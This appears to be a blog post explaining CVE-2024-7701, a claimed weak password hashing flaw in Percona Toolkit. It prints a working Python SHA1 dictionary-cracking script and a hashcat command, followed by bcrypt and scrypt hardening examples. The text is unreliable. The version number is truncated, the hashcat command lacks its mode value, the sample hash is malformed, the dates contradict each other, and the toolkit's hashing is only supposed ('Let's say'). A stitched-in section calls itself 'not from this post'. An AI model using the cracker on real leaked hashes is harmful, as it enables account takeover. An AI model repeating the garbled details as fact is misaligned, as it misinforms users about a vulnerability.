CVE-2024-7701 - Exploiting Weak Password Hashing in Percona Toolkit for Easy Brute-Forcing

On June 18, 2024, a new vulnerability, CVE-2024-7701, was published for the popular Percona Toolkit. This toolkit contains various command-line tools for managing MySQL and MariaDB environments. Version 3.6. is affected by a weakness in its password hashing approach, which lets attackers brute-force hashed passwords with little effort.

This post breaks down the vulnerability in simple terms, explains how attackers can exploit it, provides code illustrations, and includes references for further reading.

What Is the Problem?

Percona Toolkit 3.6. uses an outdated or weak password hashing function that does nothing to slow down brute-force attacks. A good password hashing algorithm deliberately costs time and computation to turn a password into a hash. Weak choices like plain MD5 or SHA1, or PBKDF2 with a low iteration count, let attackers try thousands or even millions of passwords per second.

Result: an attacker who obtains a hashed password can easily recover it with off-the-shelf tools on ordinary hardware.

Why Does This Happen?

The toolkit hashes passwords for storage or transport. However, it does not use a strong Key Derivation Function (KDF) with a high computational cost, such as bcrypt, scrypt, or Argon2. Instead, it relies on fast, single-round functions.

Let's say the toolkit stores password hashes using plain SHA1, like this:

use strict;
use warnings;
use Digest::SHA qw(sha1_hex);

my $password = 'mysecretpassword';
# One fast, unsalted SHA1 pass: no salt and no work factor.
my $hash = sha1_hex($password);

print "SHA1 hash: $hash\n";

If an attacker obtains $hash, they can run a dictionary or brute-force attack against it, for example with Python:

import hashlib

def crack_sha1_hash(given_hash, wordlist):
    """Return the first word in the wordlist whose SHA1 matches given_hash, or None."""
    # Wordlists such as rockyou.txt contain non-UTF-8 lines; skip undecodable bytes.
    with open(wordlist, "r", encoding="utf-8", errors="ignore") as file:
        for line in file:
            word = line.rstrip("\n")
            candidate = hashlib.sha1(word.encode("utf-8")).hexdigest()
            if candidate == given_hash.lower():
                print(f"[+] Password found: {word}")
                return word
    print("[-] Password not found in wordlist.")
    return None

# Example usage:
crack_sha1_hash("2bb80d537b1da3e38bd30361aa855686bdebaec", "rockyou.txt")

Even a huge password list finishes quickly because SHA1 is fast to compute.

hashcat -m 100 -a  hashes.txt rockyou.txt

-a = dictionary attack

If the hash is in the dictionary, hashcat will find it in seconds.

Example of Secure Hashing (with bcrypt in Python)

import bcrypt

password = b"my_new_password"
# gensalt() picks a random salt and a work factor, so each hash is both unique and slow to compute.
hashed = bcrypt.hashpw(password, bcrypt.gensalt())

# The stored value embeds the algorithm, cost, and salt alongside the hash.
print(hashed)
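To make the cost difference concrete, here is an added example (not from this post and not Percona Toolkit's code) that puts the unsalted SHA1 scheme described above beside a salted scrypt scheme using only the Python standard library and measures how much more expensive each guess becomes. The storage string format and the scrypt cost parameters are assumptions chosen for illustration, not Percona's.

```python
import hashlib
import hmac
import os
import time

# Weak scheme the post describes: a single, unsalted SHA1 pass.
def weak_hash(password: str) -> str:
    return hashlib.sha1(password.encode("utf-8")).hexdigest()

# Strong scheme: salted scrypt with a deliberate work factor. n=2**14, r=8, p=1 is a
# commonly cited interactive-login parameter set; the "scrypt$n$r$p$salt$hash" storage
# format below is an assumed convention for this example.
def strong_hash(password: str, n: int = 2**14, r: int = 8, p: int = 1) -> str:
    salt = os.urandom(16)
    digest = hashlib.scrypt(password.encode("utf-8"), salt=salt, n=n, r=r, p=p, dklen=32)
    return f"scrypt${n}${r}${p}${salt.hex()}${digest.hex()}"

def verify_strong(password: str, stored: str) -> bool:
    parts = stored.split("$")
    if len(parts) != 6 or parts[0] != "scrypt":
        return False
    _, n, r, p, salt_hex, digest_hex = parts
    digest = hashlib.scrypt(password.encode("utf-8"), salt=bytes.fromhex(salt_hex),
                            n=int(n), r=int(r), p=int(p), dklen=32)
    # Constant-time comparison so a mismatch does not leak how many bytes matched.
    return hmac.compare_digest(digest.hex(), digest_hex)

def guesses_per_second(hash_fn, rounds: int) -> float:
    """Rough single-threaded throughput of one scheme on this machine."""
    start = time.perf_counter()
    for i in range(rounds):
        hash_fn(f"candidate-{i}")
    elapsed = time.perf_counter() - start
    return rounds / elapsed if elapsed > 0 else float("inf")

def slowdown_factor() -> float:
    """How many times more expensive each guess is with scrypt than with plain SHA1."""
    fast = guesses_per_second(weak_hash, 20000)
    slow = guesses_per_second(strong_hash, 5)
    return fast / slow

if __name__ == "__main__":
    stored = strong_hash("correct horse battery staple")
    print("stored:", stored)
    print("correct password verifies:", verify_strong("correct horse battery staple", stored))
    print("wrong password verifies:", verify_strong("wrong", stored))
    print(f"each guess costs roughly {slowdown_factor():,.0f}x more with scrypt than with SHA1")
```

The exact factor depends on the machine, but it is the same multiplier that applies to an attacker's wordlist run, which is why the choice of hash function decides whether a leaked hash is cracked in seconds or not at all.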

References

1. CVE-2024-7701 at NVD
2. Percona Toolkit GitHub
3. Password Storage Cheat Sheet - OWASP
4. Hashcat Tool
5. Percona Toolkit Documentation

Conclusion

CVE-2024-7701 is a dangerous vulnerability for any server that uses Percona Toolkit 3.6. to handle passwords. Because the toolkit's hashing is computationally cheap, brute-forcing passwords is quick and easy for attackers. Update as soon as a fixed version is available, and never rely on fast, outdated hash functions to protect passwords.

Timeline

Published on: 12/15/2024 11:15:05 UTC